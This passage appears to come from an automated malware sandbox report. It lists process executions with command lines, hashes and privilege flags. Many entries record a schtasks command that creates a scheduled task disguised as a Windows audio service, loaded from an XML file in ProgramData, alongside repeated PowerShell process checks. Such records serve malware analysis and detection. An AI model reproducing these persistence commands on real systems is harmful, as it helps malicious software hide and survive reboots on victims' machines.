                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:92
                                                                                                                  Start time:10:10:40
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:93
                                                                                                                  Start time:10:10:43
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:94
                                                                                                                  Start time:10:10:43
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:95
                                                                                                                  Start time:10:10:45
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:96
                                                                                                                  Start time:10:10:47
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:97
                                                                                                                  Start time:10:10:47
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:98
                                                                                                                  Start time:10:10:53
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:99
                                                                                                                  Start time:10:10:53
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:100
                                                                                                                  Start time:10:10:55
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:101
                                                                                                                  Start time:10:10:59
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:102
                                                                                                                  Start time:10:10:59
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:103
                                                                                                                  Start time:10:10:59
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:104
                                                                                                                  Start time:10:11:05
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:105
                                                                                                                  Start time:10:11:05
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:106
                                                                                                                  Start time:10:11:05
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:107
                                                                                                                  Start time:10:11:10
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:108
                                                                                                                  Start time:10:11:13
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:109
                                                                                                                  Start time:10:11:13
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:110
                                                                                                                  Start time:10:11:17
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:111
                                                                                                                  Start time:10:11:20
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:112
                                                                                                                  Start time:10:11:20
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:113
                                                                                                                  Start time:10:11:22
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:114
                                                                                                                  Start time:10:11:23
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:115
                                                                                                                  Start time:10:11:28
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:116
                                                                                                                  Start time:10:11:28
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:117
                                                                                                                  Start time:10:11:28
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:118
                                                                                                                  Start time:10:11:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:119
                                                                                                                  Start time:10:11:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:120
                                                                                                                  Start time:10:11:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:121
                                                                                                                  Start time:10:11:40
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:122
                                                                                                                  Start time:10:11:47
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:123
                                                                                                                  Start time:10:11:48
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:124
                                                                                                                  Start time:10:11:48
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:125
                                                                                                                  Start time:10:11:54
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:126
                                                                                                                  Start time:10:11:58
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:127
                                                                                                                  Start time:10:11:58
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:128
                                                                                                                  Start time:10:11:59
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:129
                                                                                                                  Start time:10:12:00
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:130
                                                                                                                  Start time:10:12:07
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:131
                                                                                                                  Start time:10:12:08
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:132
                                                                                                                  Start time:10:12:08
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:133
                                                                                                                  Start time:10:12:16
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:134
                                                                                                                  Start time:10:12:16
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:135
                                                                                                                  Start time:10:12:27
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
